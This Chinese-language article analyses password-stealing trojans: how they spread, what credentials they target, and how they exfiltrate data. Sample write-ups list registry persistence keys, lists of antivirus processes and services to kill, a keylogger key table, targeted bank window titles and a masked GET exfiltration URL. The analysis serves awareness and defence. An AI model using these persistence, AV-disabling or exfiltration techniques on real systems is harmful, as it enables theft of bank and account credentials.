如何在用户电脑中获取到敏感信息呢?
究竟木马作者所感兴趣的敏感信息有哪些?
当获取到信息后,又是如何将信息发送给木马所有者呢?
下面就是总结出的一些Trojan-PSW木马特点:
用户电脑本身存在系统漏洞,如操作系统漏洞或者是IE浏览器漏洞等,都可以被不法分子利用,直接将木马程序复制或者下载到用户电脑并进行安装。
据统计,这种传播方式最为有效,也是木马所有者惯用伎俩,即时聊天工具 的普及给了他们传播木马程序的媒介,且利用了人们的好奇、贪小便宜的心理以及对好友不设防的薄弱思想,通过发送一段具有诱惑性内容的消息,附带一个链接, 诱使用户点击访问。一旦访问,就会自动将木马程序下载到用户机器并运行起来。
木马程序所有者通常会在一些音乐网站或者知名论坛发布一些虚假消息,如一些小工具、恶意网站地址,欺骗用户说可以获取何种利益,其中就安放了一些木马程序,等待用户下载运行。
木马所有者发送附带木马程序的电子邮件,邮件主题比较吸引人,使用户浏览附件,从而感染木马。
通常重要的信息可能存在几类文件中,比如.txt文本、.doc文档、.xls表格等 等,那么木马作者可能就会让木马程序自动搜索用户电脑上可能记录了关键信息的文件,从中获取字符串,并记录在自己的日志文件里;此外窃取密码的木马针对性 比较强,如针对于某一个网络游戏、某一种商业软件,其记录关键信息的位置往往也固定于一些文件之中,通过遍历文件,搜索其中关键字符,也同样能够获取到有 用信息。
这类木马功能较为简单,不针对各类文件,而直接针对于用户输入信息的关键设备——键盘。木马运行后,会将用户敲击键盘的顺序和内容记录下来,存为一个文本,其中可能就包括了用户的一些常用的帐号和密码,成功率也比较高。
当木马检测到某个程序的窗口为当前有效窗口时,其会启动记录功能,将用户输入到窗口的信息完整记录下来,例如检测传奇客户端窗口。
用户在登陆一些网页时会产生一些cookie信息,其中可能包含了一些像用户名及密码一类的关键信息,木马程序会读取cookie文件,从而获得有效信息。
像工商银行、交通银行、商业银行、招商银行、农业银行、中国银行等指明国内银行的帐号密码以及信用卡等业务的相关资料。
国外的情况也类似,主要设计到集中信用卡的信息窃取,如Visa、MasterCard等。
随着网络游戏近几年的飞速发展,其拥有的玩家也越来越多,游戏所制造的网上财富也日益 增加,一时间,大量木马瞄准了这块风水宝地。因此也出现了大量针对于网络游戏的木马,像传奇盗号的木马已经成为一个家族——Trojan- PSW.Win32.Lmir,变种不计其数。通过获取玩家的游戏帐号和密码,木马所有者或将玩家人物角色卖出,或将玩家高级装备在游戏中出售,从而获取 高额“利润”。通常他们都是在获得该装备后,迅速把装备转移到他在该区申请的游戏帐号上面,进行黑货转移,并迅速以现金进行交易,等游戏玩家申请完,整个 交易已经早早的交易完毕,这同时也指出了网络法定关于虚拟财产方面的定罪的空白。
通常指一些论坛或者电子邮箱的登陆帐号和密码,窃取这些帐号后,能够获得其中的有价值资源,或者冒充被盗人进行一些非法活动。
诸如QQ、MSN等著名聊天工具,也是此类木马及木马作者垂涎的猎物,一个好的QQ号码能够在网上卖到很高的价钱,这其中的利益就是他们行窃的原动力。
商业竞争激烈,如果能够获得对手的关键资料,那么就可能赢得一场艰难的商业战,而木马获取商业机密类信息所“赚”来的利润也是最高的。
木马所有者可能会去针对某款正版软件的序列号或者某游戏的CD-KEY进行盗窃,将这些资源卖给那些想使用正版,但苦于不能注册的用户。
木马所有者建立一个HTTP服务器,接受从木马程序反馈回的消息,通常木马程序使用get方式将消息发到服务器。
木马所有者通常会在一台电脑上搭建一个FTP服务器,并配上公网IP,然后在自己的木马程序中事先设定好,这个服务器地址。一旦木马获取到资料后,就主动连接此服务器,将资料上传,而无须人工操作。
木马所有者会在木马程序中设置一段代码完成发送电子邮件功能,将记录信息以电子邮件的方式发送到病毒所有者的邮箱中,或直接将信息写为邮件正文,或作为附件进行发送。
类似于FTP服务器,只不过类型不一样,此类服务器上传小文件,尤其像记录少量信息的文本文件,有一定的速度优势。
通过IRC服务器中的DCC命令也可以传送文件,木马所有者预先告诉木马当获得信息后连接到某个特定的IRC地址,并使用DCC命令将文件发送到所有者手上。
类似于后门程序,在感染该木马的电脑上开启一个端口,或者直接架设一个上面(1)、(2)、(3)中提到的服务器,等待用户自行下载木马文件。
病毒名称: Trojan-PSW.Win32.Lmir.lq
中文名称: 传奇天使
病毒类型: 木马
危害等级: 中
文件长度: 62,525 字节
感染系统: windows9x以上的所有版本
编写语言: Microsoft Visual C++
传奇天使是专门盗取传奇账号的木马,感染后传奇天使后,该病毒会窃取传奇玩家的 区名称和ID名称,密码,及登陆服务器。感染该病毒后会在系统目录下生成病毒相关文件winker.exe或 winker.dll,搜索反病毒及安全软件的进程,找到后便将该进程中止,通过修改注册表,启动服务,并随系统同时启动。
1)修改注册表
HKEY_LOCAL_MACHINE\Software\Classes\exefile\shell\open\command
添加键值:"默认"="%Windir%winker.exe"从而达到随系统启动的目的。
2)在系统目录下释放文件winker.exe或winker.dll。
3)关闭如下进程:天网防火墙个人版,金山网镖2003,瑞星杀毒软件。
4)修改注册表,调用kernerl32.dll的RegisterServiceProccess,从而注册为服务。
病毒类型:木马
病毒大小:16284字节
传播方式:网络
压缩方式:ASpack
该木马盗取几乎涵盖中国当时所有个人网上银行的帐号、密码、验证码等等,发送给病毒作者。此木马与4月份截获网银大盗有异曲同工之处,但涉及银行之多,范围之广是历来最大的,不但给染毒用户造成的损失更大、更直接,也给各网上银行造成更大的安全威胁和信任危机。
银联支付网关-->执行支付
银联支付网关
中国工商银行新一代网上银行
中国工商银行网上银行
工商银行网上支付
申请牡丹信用卡
招商银行个人银行
招商银行一网通
个人网上银行
中国建设银行网上银行
登陆个人网上银行
中国建设银行
中国建设银行网上银行
交通银行网上银行
交通银行网上银行
深圳发展银行帐户查询系统
深圳发展银行|个人银行
深圳发展银行 | 个人用户申请表
深圳发展银行:
民生网个人普通版
民生银行
网上银行--个人普通业务
华夏银行
上海银行企业网上银行
上海银行
首都电子商城商户管理平台
首都电子商城商户管理:
中国在线支付网: :IPAY网上支付中心
中国在线支付网商户
招商银行网上支付中心
招商银行网上支付
个人网上银行-网上支付
%SystemDir%\svch0st.exe,16284字节,病毒本身
“svch0st.exe”=“%SystemDir%\svch0st.exe”
“taskmgr.exe”=“%SystemDir%\svch0st.exe”
AabCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZz1
!2@3#4$5%6^7&8*9(0)
{BackSpace}{Tab}{回车}{Shift}{Ctrl}{Alt}{Pause}
{Esc}{空格}{End}{Home}{Left}{Right}{Up}{Down}
{Insert}{Delete}{Del}{F1} -- {F12}
{NumLock}{ScrollLock}{PrintScreen}{PageUp}{PageDown}
;:=+,<-_.>/?`~][{\|]}'
http://*****.com/****/get.asp?txt=××银行:<截获的按键>
%WinDir%\SYSTEM32.EXE, 201216字节
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"System"=%WinDir%\SYSTEM32.EXE
c:\Screen1.bmp
c:\Screen2.bmp
HKEY_LOCAL_MACHINE\SoftWare\Microsoft\Windows\CurrentVersion\Run下,
添加如下值:"NTdhcp"="%SYSTEM%\NTdhcp.exe"
KAVPersonal50RavMonRavTimerKvMonXPiDuba Personal FireWall
KAVRunKpopMonKulansynKavPFWccAppSSC_UserPromptNAV CfgWiz
MCAgentExeMcRegWizMCUpdateExeMSKAGENTEXEMSKDetectorExe
VirusScan OnlineVSOCheckTaskNetwork Associates Error Reporting Service
KavStartKWatch9x
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RsRavMon
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RsCCenter
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\kavsvc
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\KVSrvXP
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wscsvc
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\KPfwSvc
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\KWatchSvc
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SNDSrvc
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ccProxy
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ccEvtMgr
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ccSetMgr
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SPBBCSvc
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Symantec Core LC
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\navapsvc
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NPFMntor
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MskService
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\FireSvc
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\McShield
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\McTaskManager
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\McAfeeFramework
FireTray.exe UpdaterUI.exe TBMon.exe SHSTAT.EXE RAV.EXE RAVMON.EXE
RAVTIMER.EXE KVXP.KXP KVCENTER.KXP Iparmor.exe MAILMON.EXE
KAVPFW.EXE KmailMon.EXE KAVStart.exe KATMain.EXE TrojanDetector.EXE
KVFW.EXE KVMonXP.KXP KAVPLUS.EXE KWATCHUI.EXE KPOPMON.EXE
KAV32.EXE CCAPP.EXE MCAGENT.EXE MCVSESCN.EXE MSKAGENT.EXE
EGHOST.EXE KRegEx.exe TrojDie.kxp KVOL.exe kvolself.exe KWatch9x.exe
















